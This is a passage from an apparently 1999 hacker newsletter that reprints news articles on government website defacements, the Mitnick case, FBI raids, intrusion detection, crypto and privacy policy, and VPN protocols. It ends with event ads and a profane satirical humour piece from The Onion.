experienced in recent weeks on their sites, he said.
Attacking U.S. government Web sites is becoming an increasingly popular
tool of people angry with the Clinton administration and its agencies.
Last week hackers responded to a six-state FBI sweep of about 20 suspected
hackers by attacking several government Internet locations, forcing the
FBI, the Interior Department, and the U.S. Senate to temporarily shut down
their Web sites.
After NATO jets hit the Chinese Embassy in Belgrade in May, hackers from
China attacked a handful of U.S. government sites, including one
maintained by the Energy Department. In an unrelated incident, the
official White House site was shut down briefly because of an attempt to
tamper with it by unidentified hackers, officials said.
In recent years the Justice Department's site was shut down once by
hackers who put Nazi swastikas on its home page, and hackers forced the
CIA to shut down its site after they changed the name from "Central
Intelligence Agency" to "Central Stupidity Agency."
With many U.S. government sites under attack, computer security experts
are bracing for what could be a month full of additional Internet hacking
incidents.
Supporters of Kevin Mitnick, a hacker jailed in Los Angeles since February
1995, will demonstrate in 14 U.S. cities Friday, seeking his release to a
halfway house and an easy probation when he is sentenced on June 14.
Mitnick, 35, pleaded guilty on March 26 to seven counts of wire fraud,
computer fraud, and illegal interception of a wire communication.
Federal officials said he impersonated an employee of Finland-based Nokia
Mobile Phones to steal software worth $240,000. He also stole software
from Motorola, Novell, Fujitsu Network Transmission Systems, and Sun
Microsystems, federal officials said.
Supporters of Mitnick say the four years Mitnick has spent in jail
awaiting trial is a harsher term than for many people convicted of violent
crimes like robbery and assault. Their protest Friday will be seeking a
more lenient sentence.
The U.S. attorney for the Central District of California said Mitnick will
be sentenced to 46 months in prison on June 14 as part of his plea bargain
agreement with the government.
Mitnick, whose exploits as a hacker inspired an upcoming Hollywood movie,
also will be obliged to pay the victims of his crimes from any profits he
makes from books or movies about his life, a spokesman for the U.S.
attorney's office said.
While hacking incidents may not be part of Friday's nationwide protest,
there may be a surge in attacks across the Internet if Mitnick's sentence
is perceived as too stiff, said John Vranesevich, the founder and director
of AntiOnline.
"Hackers attack when they're mad about something. The demonstration Friday
will be an attempt to educate," said Vranesevich. "However, if Kevin
Mitnick is put in jail, there very well could be more attacks after that."
Still, other experts said Internet sites should upgrade their security
against possible attack before Friday.
"Given the timing, it probably would be a good idea to be more on guard
than usual," said Jevon Jaconi, the district attorney of Kewaunee County,
Wisconsin, and an expert in the developing field of cyberspace law.
Between 70 percent and 80 percent of all Internet hacking attacks come on
systems that have not updated their security codes, routinely sent by
computer manufacturers and network administrators, Jaconi said.
The best way to prevent hacking attacks in the future is to heed those
security warnings and implement the needed changes, he said.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
48.0 [ISN] Federal Cybercrime unit hunts for hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[Moderator: This article will be going on the Errata site soon. This
contains a wide variety of errors regarding the role and actions of John
Vranesevich and AntiOnline. Mr. Richtel chose to believe JV at face
value, and apparently did not challenge anything he said.]
http://www.nytimes.com/library/tech/99/mo/biztech/articles/02hack.html
June 2, 1999
Federal Cybercrime Unit Hunts for Hackers
By MATT RICHTEL
Raids by agents of the Federal Bureau of Investigation last week against
several suspected computer hackers are part of a new Government cybercrime
unit's crackdown against illegal tampering with computer networks and Web
sites, a Federal prosecutor said Tuesday.
The raids prompted a counteroffensive in which disparate hacker groups
took responsibility for bringing down additional corporate and Government
sites, including the F.B.I.'s public information site.
The events escalated a longstanding game of tit-for-tat between pranksters
using personal computers and a newly galvanized Federal police force stung
by recent attacks on some of the Government's high-level Web sites.
Paul E. Coggins, the United States Attorney in Dallas who is overseeing
the effort, said yesterday that Federal prosecutors had issued 16 warrants
in 12 jurisdictions after a yearlong investigation, but had not yet
charged anyone with a crime.
The investigation is part of the Government's new, Dallas-based cybercrime
task force, which includes the F.B.I., the Secret Service, the United
States Attorney's Office and the Defense Department, Coggins said.
"It's probably the most far-reaching investigation of its kind," he said.
"It's an investigation with national and international implications."
Coggins declined to elaborate or to say whether the targets of the
investigation were considered to be part of a conspiracy.
Don K. Clark, a special F.B.I. agent in Houston, said the activities under
investigation included stealing and misusing credit card numbers and
computer passwords.
Two of those who were raided by the bureau's agents last Wednesday said
one connection between some of the targets was that they knew one another
from various discussion groups in an Internet chat forum called Internet
Relay Chat. The participants said that the talk sometimes revolved around
hacking techniques but that they were not involved in any general hacking
conspiracy with other members of the discussion groups.
"I have never defaced any Web pages or taken out any major sites," said
Paul Maidman, 18, of Waldwick, N.J., one of those who were raided.
Referring to proprietary computer systems, he said: "I got into other
servers. I'd look around, read some E-mail, and that would be it."
Maidman said he was awakened last Wednesday morning by five or six armed
F.B.I. agents surrounding a living room couch where he slept. He said the
agents confiscated a computer, some diskettes, CD-ROM's and other computer
paraphernalia.
Two Internet service providers have also received requests for
documentation in connection with the case. The requests, parts of which
have been posted on the Internet, seek information about dozens of
hackers, hacker groups and software used by hackers.
John Vranesevich, who operates the Anti-Online Web site, which chronicles
hacker activity, said the information requested from Internet service
providers involved software tools, computer files and aliases pertaining
to hacker activities.
Vranesevich said several of the aliases actually represented software
programs called "bots," which are posted in chat rooms as automated
monitors but may have been mistaken by F.B.I. agents for human
participants.
"Anything that has to do with hackers they're going after," he said. "I'm
not going to call this a witch hunt, but it's an uninformed
investigation."
Meanwhile, hacker groups continued attacks on corporate and Government
computers, in some cases making sites inaccessible and, in others, taking
over sites with their own messages, some of them profane. The F.B.I. site,
taken down last week, remained inaccessible yesterday.
One hacker group, which calls itself F0rpaxe, says it is based in Portugal
and takes responsibility for "massive attacks" on various Web sites, sent
a statement to Anti-Online saying, "If the F.B.I. doesn't stop we won't,
and we can start destroying."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
49.0 [ISN] Hong Kong Computer Hacking Syndicate Smashed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
www.infowar.com
6/1/99
Hong Kong Computer Hacking Syndicate Smashed
HONG KONG, CHINA, 1999 MAY 30 (Newsbytes) -- By Staff Writer, IT Daily.
Hong Kong police arrested an organized group of computer hackers last
week, seizing computers and CD-ROMS, after a five-month hunt.
The arrests marked the first time an organized hacking group has been
arrested in Hong Kong.
Acting on complaints from several local Internet service providers (ISPs)
that the accounts of their clients might had been hacked late last year,
officers from the Computer Crime Section of the Commercial Crime Bureau
(CCB) launched investigations in January, culminating in a series of raids
last week.
Two men, including a suspected hacker and a middleman were arrested in the
first two days of the operation starting on May 20. In all, ten men were
arrested. The suspects were aged between 16 and 21 and included three
hackers, six buyers of the passwords and a middleman who arranged the
sales.
Operating as a syndicate, the hackers stole the passwords and personal
information on legitimate Internet account holders and sold them.
The principal hacker collected information on over 200 accounts and sold
them through a middleman to users who wanted cheap, unlimited Internet
access. Hilton Chan, head of the Computer Crime Section of the CCB told
ITDaily.com that most of the end-users wanted to use the time to access
online gaming sites.
According to police, the buyers paid HK$350 (US$45.13) each for a month's
access, and clocked up Internet time worth between HK$2,000 and HK$3,000
($257.88 and $386.82) each. Most local ISPs charge under HK$150 ($19.34)
per month for unlimited usage, but users must still pay HK$1.98 ($0.26)
per hour for the Public Non-Exclusive Telecommunications (PNETS) license
fee.
The middleman communicated with its clients through telephone and the ICQ
online cmessaging service.
Investigations also showed that one of the hackers set up a Web page on
the Internet offering pirate music CDs for sale. Each disk featured over
100 songs downloaded from the Internet or dubbed from copyrighted computer
disks. The disks were selling for HK$88 ($11.35) each or HK$160 ($20.63)
for two copies.
Ten sets computers and peripheral equipment believed to be used in the
hacking and about 700 CD-ROMs were seized during the operation.
Chan said that the maximum penalty is five years' imprisonment. He also
advised users to protect themselves against hackers. "Don't store your
password on the computer terminal, and change your password more
frequently," advised Chan. He also advised users not to use easy to
replicate passwords and be careful when downloading from the Web. "If you
don't know the source of it don't download it," Chan said.
Exchange Rate: $1 = HK$7.75
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
50.0 [ISN] New Tools Prevent Network Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.nytimes.com/techweb/TW_New_Tools_Prevent_Network_Attacks.html
June 3, 1999
New Tools Prevent Network Attacks
Filed at 8:49 a.m. EDT
IT managers alarmed by high-profile security breaches are gaining new
software tools to ward off network attacks.
Axent Technologies this week will release an intrustion-detection system
with improvements to protect networks against a range of existing and new
types of attacks in real time.
Internet Security Systems (ISS) will rollout a souped-up version of its
RealSecure system that filters out false alarms from real attacks with
greater efficiency and precision. Other vendors said they plan product
updates by year's end. CyberSafe, for example, will deliver security
features that detect intrusions in individual applications.
The advancing functionality of these high-tech burglar alarms comes as
Internet-based computing exposes security vulnerabilities. Recent hacker
attacks on the FBI and other government websites, as well as the loss of
sensitive nuclear weapons information to China, have heightened corporate
awareness of the need for multiple layers of network security.
As intrusion-detection systems "enter their midlife, they are starting to
become a viable part of the total protection strategy in many
corporations," said Mike Hagger, vice president of network security at
Oppenheimer Funds. The investment company uses ISS' RealSecure to identify
and respond to certain types of hacker attacks, such as SYN flood attacks.
"Intrusion detection is only one line of defense," Hagger added, citing
the need for firewalls, antivirus and authentication tools.
Jim Patterson, director of security at service provider Level 3
Communications, agreed, saying intrusion-detection systems must move
beyond simple event detection to behavioral analysis. If an intruder is
using a "valid ID or password, the typical system wouldn't pick that up as
wrong behavior," he said.
IT managers also need tools that will help them build a baseline of
typical usage patterns. Thus, if a user tried to access a network at 2
a.m., for example, an IT manager would be notified.
"I want to get details on what things are being accessed and what systems
are being used," Patterson said.
For Electronic Data Systems, intrusion detection could be the first line
of defense. The IT services provider is testing Axent's NetProwler 3.0 on
the access point into the network-outside the firewall, said Wayde York, a
network operations supervisor at EDS.
By placing NetProwler at the network perimeter, it can detect "stealth
scans and newer attacks" that the firewall typically won't pick up, he
said. Placing the intrusion- detection system in front of the firewall
also reduces the false alarms common to these network-based systems, York
said, because it's less likely to have to monitor a wide variety of
traffic types, as it would inside the firewall.
NetProwler 3.0 also can send alerts to Check Point Software Technologies'
Firewall-1 product -- which EDS uses -- once an attack is detected so that
the firewall could then be reconfigured to fend off future attacks of the
same type, York said.
Tighter integration between NetProwler and Axent's host-based Intruder
Alert system lets IT managers monitor network devices and servers from
Intruder Alert's central management console. Protecting mixed platforms
and critical resources is the goal behind ISS' product rollout, scheduled
for the week of June 14.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
51.0 [ISN] U.K. Crypto Policy May Have Hidden Agenda
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.nytimes.com/techweb/TW_U_K_Crypto_Policy_May_Have_Hidden_Agenda.html
June 3, 1999
U.K. Crypto Policy May Have Hidden Agenda
Filed at 5:06 a.m. EDT
By Madeleine Acey for TechWeb, CMPnet
Despite its abandonment of key escrow, the U.K. could be counting on the
ignorance of new Internet users to provide law enforcement easy access to
private communications, according to privacy campaigners.
Following a meeting in London on Wednesday, where ISPs drafted a code of
practice for protecting user privacy, ISP and civil liberties groups both
derided British and European Union attempts to regulate the use of
encryption, caching and unsolicited email.
ISP organizations, such as the London Internet Exchange -- or LINX --
described government policy as "extremely stupid," "misguided" and
"infeasible." But some said they found it hard to believe incompetence was
behind it.
LINX chairman Keith Mitchell said the latest version of proposed
legislation regarding law enforcement access to encrypted email and
computer files was based on a "misguided conception" that ISPs would
provide users with encryption.
A senior government official said last week the government expected most
warrants demanding keys to encrypted material would be served on service
providers.
"The only encryption of any use on the Internet is end-to-end. The keys
are generated between the users. All the ISP is going to see is an
encrypted data stream," Mitchell said.
"I still don't know a single Home Office employee that has an email
address," he said. But of the encryption warrant policy, he said the
government "either doesn't understand or is deliberately
misunderstanding."
"I think they are deliberate," said Yaman Akdeniz of Cyber-Rights &
Cyber-Liberties. "They don't want to give away what they want to do." He
said there was a lot of pressure on lawmakers from the National Criminal
Intelligence Service, which wanted easy access.
"The Home Office believes users will go to [third parties], like the Post
Office, to get keys," said Nicholas Bohm, spokesman for the Foundation for
Information Policy Research. "They should not be promoting a policy where
private keys are generated by anybody but the user."
He, along with Akdeniz, said it was possible the government was planning
to create a new market, favorable to easy law enforcement access, where
new Internet users -- unaware of the tradition of free user-to-user
encryption -- would go to "trusted third parties" for encryption services
because they were endorsed by the government as safe. "If these new
services are there, many people will use them," Akdeniz said.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
52.0 [ISN] Tackling E-Privacy in New York
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Dan Moniz <dnm@unix-security.net>
Tackling E-Privacy in New York
by Chris Oakes
If the federal government won't get tough with the issue of online
consumer privacy, New York state is determined to do it.
The New York State Assembly has passed the part of a legislative package
designed to erect unprecedented privacy safeguards for consumer
information in the information age.
"The more you learn about computers and email and ordering and passing
information by email and the Internet, the more people realize that laws
that protect them in different venues are not in place on the Internet,"
said Assemblywoman Audrey Pheffer.
Pheffer, a Democrat from Queens, is head of the Consumer Affairs and
Protections Committee and author of several measures in the legislative
package, considered the most comprehensive state action on consumer
privacy to date.
Fourteen bills passed last week are expected to pass committee and reach
the assembly floor as early as this week. The New York Senate plans to
present its own privacy package this summer.
The broad-ranging measures grew out of the increasing availability of
personal information. The bills target privacy invasions that the assembly
said could lead to everything from personal financial loss and damaged
credit ratings to discrimination.
The authors blame the new risks on computers and Internet use, and modern
technology in general, which threaten privacy with everything from DNA
advances to the widespread selling and distribution of digital
information.
"We had to do this because three to five years ago we never thought when
we passed legislation that this would be something we'd have to deal with
-- the theft of identity, the selling of email information, the selling of
digital photo images," Pheffer said.
The bills require confidentiality of personal records, prevent the selling
of email addresses without consent, and prohibit various sophisticated
telemarketing tricks enabled by modern technology.
"We tried to deal with the many issues we and the attorney general have
received complaints on," Pheffer said.
Whereas consumers used to worry about the theft of a credit card or a
driver license, Pheffer said that the dangers of information theft are
much greater.
"[A thief] can steal everything so that they [can] become you. We've had
stories where people had automobiles ordered [in their name] and just by
luck were able to actually stop the delivery of the car. It's much more
than the stealing of a credit card."
Identity theft is enabled by electronic access to home addresses, social
security numbers, and the like, Pheffer said.
The new legislation isn't just targeted at data collected by thieves. It
places companies under scrutiny, too.
"As technology provides more efficient ways for commercial enterprises to
gather and distribute information to consumers, it is vital that the laws
of the state be modernized to ensure personal privacy," said Attorney
General Eliot Spitzer in statement. Spitzer is one of the primary authors
and presenters of the legislative package.
Spitzer said that the legislation he authored will strengthen the
individual's control over personal information.
Privacy experts and advocates are enthused.
"The New York legislation package is very, very exciting," said Paul
Schwartz, a law professor at Brooklyn Law School. "I think that this is
something that is going to shift power to people on the Internet, and
increase the transparencies of [privacy] policies [online]."
"It's not surprising that states are moving when Washington policy
legislators are largely sitting on their hands," said Marc Rotenberg,
executive director of the Electronic Privacy Information Center.
Existing federal measures to protect consumer privacy are largely directed
at children. The Federal Trade Commission is charged with protecting
privacy, but it can only bring limited civil actions.
Critics charge that the US Commerce Department has failed to put its teeth
behind consumer privacy because the Internet industry has successfully
lobbied the agency that the associated costs of such a move would threaten
the nation's lead in global e-commerce.
In a privacy hearing in Washington last week, Rotenberg said that Congress
showed itself to be inactive on the issue.
"Everyone sat back and said 'Oh, it looks like self-regulation is working
[and we] don't need to do anything.... By and large, I think the states
have not been very impressed. So now they're dealing with wide range of
issues."
New York has been a state leader in areas of consumer protection and
privacy protection, Rotenberg said.
But Rotenberg noted that the potential impact of the various bills on
Internet activity is still unclear. "By and large, the bills really target
activity off the Internet," Rotenberg said. "[They] treat the Internet as
one of many privacy issues."
Still, one of the measures in the package would add a prohibition of the
sale, lease, or exchange of any consumer's email address and any other
personal identifying information that might be obtained online without a
consumer's consent.
Jason Catlett, of the online privacy watchdog group Junkbusters, is
especially pleased with that measure.
But he and others caution that the statewide reach of the legislation is
one caveat for anyone hoping for far-reaching impact.
"Most privacy advocates and experts would prefer to see broad federal
legislation for the protection of personal data," said Catlett. "But some
of these piecemeal measures may prevent some very specific injuries that
consumers are suffering daily."
Still, he said that some of the bills have a "private right of action,
which allows individual consumers to sue companies that invade their
privacy." That principle has worked well in telemarketing legislation and
deserves to be extended to personal data protection, he said.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
53.0 [ISN] Congress, NSA butt heads over Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Putrefied Cow <waste@zor.hut.fi>
Originally From: 7Pillars Partners <partners@sirius.infonex.com>
Congress, NSA butt heads over Echelon
BY DANIEL VERTON (dan_verton@fcw.com)
Congress has squared off with the National Security Agency over a
top-secret U.S. global electronic surveillance program, requesting top
intelligence officials to report on the legal standards used to prevent
privacy abuses against U.S. citizens.
According to an amendment to the fiscal 2000 Intelligence Authorization
Act proposed last month by Sen. Bob Barr (R-Ga.), the director of Central
Intelligence, the director of NSA and the attorney general must submit a
report within 60 days of the bill becoming law that outlines the legal
standards being employed to safeguard the privacy of American citizens
against Project Echelon.
Echelon is NSA's Cold War-vintage global spying system, which consists of
a worldwide network of clandestine listening posts capable of intercepting
electronic communications such as e-mail, telephone conversations, faxes,
satellite transmissions, microwave links and fiber-optic communications
traffic. However, the European Union last year raised concerns that the
system may be regularly violating the privacy of law-abiding citizens
[FCW, Nov. 17, 1998].
However, NSA, the supersecret spy agency known best for its worldwide
eavesdropping capabilities, for the first time in the history of the House
Permanent Select Committee on Intelligence refused to hand over documents
on the Echelon program, claiming attorney/client privilege.
Congress is "concerned about the privacy rights of American citizens and
whether or not there are constitutional safeguards being circumvented by
the manner in which the intelligence agencies are intercepting and/or
receiving international communications...from foreign nations that would
otherwise be prohibited by...the limitations on the collection of domestic
intelligence," Barr said. "This very straightforward amendment...will help
guarantee the privacy rights of American citizens [and] will protect the
oversight responsibilities of the Congress which are now under assault" by
the intelligence community.
Calling NSA's argument of attorney/client privilege "unpersuasive and
dubious," committee chairman Rep. Peter J. Goss (R-Fla.) said the ability
of the intelligence community to deny access to documents on intelligence
programs could "seriously hobble the legislative oversight process"
provided for by the Constitution and would "result in the envelopment of
the executive branch in a cloak of secrecy."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
54.0 [ISN] Visa, Wells Fargo Deliver E-Payment Alternatives
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: darek milewski <darekm@cmeasures.com>
Visa, Wells Fargo Deliver E-Payment Alternatives
New Options for handling credit card transactions over the Web are
emerging as cheaper and simpler alternatives to the dormant SET standard.
As merchants continue to call for SET alternatives, two financial services
giants--credit card company Visa International and online banking leader
Wells Fargo & Co.--are trying a new approach: issuing digital certificates
for use in SSL-based sessions.
Visa, which co-developed SET with MasterCard International, will now let
banks issue RSA Data Security X.509 digital certificates to merchants and
will provide those banks with data collection, authorization, routing and
settlement services for Internet transactions through its new Visa Payment
Gateway.
The gateway, to go live this summer, gives merchants using the Visanet
point-of-sale network access to that same network through Web channels.
That means there's no legacy-systems integration required by Visa USA's
6,000 member banks, many of which have characterized the Secure Electronic
Transactions (SET) protocol as a gamble because of the implementation
costs.
Visa's gateway arrives just one week after Wells Fargo said it will offer
merchants e-commerce services that combine Secure Sockets Layer (SSL)
encryption with digital certification. Wells Fargo has partnered with
GTE's CyberTrust business unit to issue digital certificates to merchants.
While both Visa and Wells Fargo still support SET, the moves underscore
the difficulties that SET has faced.
Few merchants and banks have installed SET-enabled systems because of
their cost and complexity. In fact, less th
an 1 percent of U.S. merchants
polled by Forrester Research said they are using or plan to use SET on
their sites. Also, consumers have little incentive to use the e-wallet
applications that SET requires, analysts said.
Today, most Web storefronts protect credit card data using SSL encryption
but do not validate users' identities with digital certificates.
-- Jeffrey Schwartz
http://www.internetwk.com/story/INW19990602S0002
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
55.0 [ISN] Protocols serve up VPN security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: darek milewski <darekm@cmeasures.com>
http://www2.nwfusion.com:8001/cgi-bin/print.cgi?article=http://www.nwfusion.com/news/tech/0531tech.html
Protocols serve up VPN security
By GREG MARCOTTE
Network World, 05/31/99
As the need to securely open corporate LANs to telecommuters and disparate
corporate sites grows, virtual private networks (VPN) continue to meet the
demand. VPNs - which establish private, secure sessions between two or
more LANs or between remote users and a LAN - use the Internet or private
IP networks to distribute data and enable corporations to eliminate
additional, often expensive, dedicated lines or remote access servers.
Today, network executives must weigh two protocols that specify how VPNs
should be built. The Point-to-Point Tunneling Protocol (PPTP) and IP
Security (IPSec) protocol enable private sessions over the Internet and
securely link remote users to corporate networks. The protocols also
possess relative strengths and weaknesses in data security and ease of
deployment. Network managers must determine which VPN protocol best suits
the need of their organizations.
Diagram of how PPTP works
PPTP vs. IPSec security
Spearheaded by Microsoft and US Robotics, PPTP was first intended for
dial-up VPNs. The protocol was meant to augment remote access usage by
letting users dial in to local ISPs and tunnel into their corporate
networks. Unlike IPSec, PPTP was not intended to address LAN-to-LAN
tunneling when it was first created.
PPTP extends PPP - a protocol that defines point-to-point connections
across an IP network. PPP is widely used to connect dial-up and broadband
users to the public Internet or private corporate networks. Because PPP
functions at Layer 2, a PPTP connection that encapsulates PPP packets
allows users to send packets other than IP, such as IPX or NetBEUI. IPSec,
on the other hand, functions at Layer 3 and is only able to provide the
tunneled transport of IP packets.
The encryption method commonly used in PPTP is defined at the PPP layer.
Typically, the PPTP client is the Microsoft desktop, and the encryption
protocol used is Microsoft Point-to-Point Encryption (MPPE). MPPE is based
on the RSA RC4 standard and supports 40-bit or 128-bit encryption.
Although this level of encryption is satisfactory for many applications,
it is generally regarded as less secure than some of the encryption
algorithms offered by IPSec, particularly 168-bit Triple-Data Encryption
Standard (DES).
Protect and serve
Meanwhile, IPSec was built for secure tunneling over the Internet between
protected LANs. It was meant for a connection with a remote office,
another LAN or corporate supplier. For instance, a large automotive
company could use an IPSec VPN to securely connect its suppliers and
support purchases orders over the 'Net.
IPSec also supports connections between remote users and corporate
networks. Similarly, Microsoft added LAN-to-LAN tunneling support for PPTP
in its Routing and Remote Access Server for Windows NT Server 4.0.
When it comes to strong encryption and data integrity, IPSec is generally
regarded as superior. The protocol combines key management with support
for X.509 certificates, information integrity and content security.
Furthermore, 168-bit Triple-DES encryption, the strongest form of
encryption available in IPSec, is more secure than 128-bit RC4 encryption.
IPSec also provides packet-by-packet encryption and authentication and
prevents the "man-in-the-middle attack," in which data is intercepted by a
third party, reconstructed and sent to the receiver.
PPTP, however, is vulnerable to such assaults, primarily because it
authenticates sessions but not individual packets. Note, however, that
mounting a successful man-in-the-middle attack against a PPTP connection
would take considerable effort and know-how.
For many corporations, the ability to run PPTP from the Windows platform
(it supports Windows NT, 95 and 98) can make deploying and maintaining a
VPN seamless. For others, PPTP is perceived as less secure than IPSec.
It is important to bear in mind, however, if deploying a VPN for remote
users, IPSec requires an organization to load specialized client software
on each desktop. Client software deployment and maintenance are a weighty
undertaking that must be considered. In terms of simplicity, PPTP is
substantially easier to deploy.
@HWA
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
<img src="http://www.csoft.net/~hwa/canc0n.gif"> <br> Come.to/Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j
http:/ 99 http:o
http:/ login: sysadmin n99 httpi
/come. password: tp://comn
to/Can me.to/Cat
c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h
http:/ industry people to attend with booths and talks. 99 http:e
/come. you could have a booth and presentation for the cost of p://comel
http:/ little more than a doorprize (tba) contact us at our main n99http:i
http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s
http:/ for updates. This is the first Canadian event of its type invalid t
403 Fo and will have both white and black hat attendees, come out logged! !
404 Fi and shake hands with the other side... *g* mainly have some IP locked
ome.to fun and maybe do some networking (both kinds). see ya there! hostname
http:/ x99http:x
o/Canc x.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x
o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99
<a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! .............
Scarfed from PacketStorm via The Onion;
I Am a Bad Ass
By Herbert Kornfeld
Accounts Receivable Supervisor
YO, waaasssuuup, baby? H-Dog is back, and don't nobody fuck with this BADASS. You wanna fuck me, motherfucker? You gonna wish you didn't. 'Cause I
the Accounts Receivable supervisor of Midstate Office Supply, and I AM a cold-blooded badass motherfucker, and if you fuck with me I'll go stone cold crazy on
your ass.
Like that motherfucker Steve Englebreiter of Associated Publishing House. Asshole thought he could postdate his goddamn check on a bill that was overdue for
nearly a month and a half. I caught it right before we was ready to deposit it. Don't tell me it was no mistake; cocksucker knew what he was doing all along. Know
what I did? Sent the goddamn thing right back along with a note saying we be passing his account along to a collection agency in two weeks if his bitch ass didn't pay
up.
Now, legally, we only supposed to notify our collection agency after 90 days, not a month and a half. But I didn't have to tell thefool that. Three days later
cocksucker sends us a cashier's check via overnight mail for the full amount. Ain't nobody fucks with my badass self.
Or take that ol' bitch Mildred Fladner who's always callin' up, bitchin' about her credit balance.
"Those staplers only cost $36.50 for the half-dozen, not $38.50. Your cashier rung it up wrong."
Then how come you didn't notice it then, y'ol ho? She high and everybody know it, but she make such a big deal about knowing the company president and
everything she got everybody runnin' scared. Except this BAD ASS.
So I go downstairs to the register she bought the staplers at, reset the date, duplicate the cashier number and purchase number, and ring the goddamn shit up at
$39.50. Then I call her back sayin' I found the original detail tape and check it out, it looks like you owe us a dollar additional, plus extra sales tax, your own receipt
must have come out poor. A week later I get a payment for the full amount, with her apologies. I pocket the extra buck and change, spend it on a lotto ticket, and
win five bucks. It's payback time for that bitch.
Now don't be messin' me up with the Accounts Payable Supervisor. The Accounts Payable Supervisor, he ain't no badass. Hell, he ain't even no man. His name
is Myron or something, and he so old he can't even get it up no more. I gots a bitch in the cash room. Myron, everybody laugh at him. He supposed to be the one
that got the money but everybody know I got it and it's no even my job.
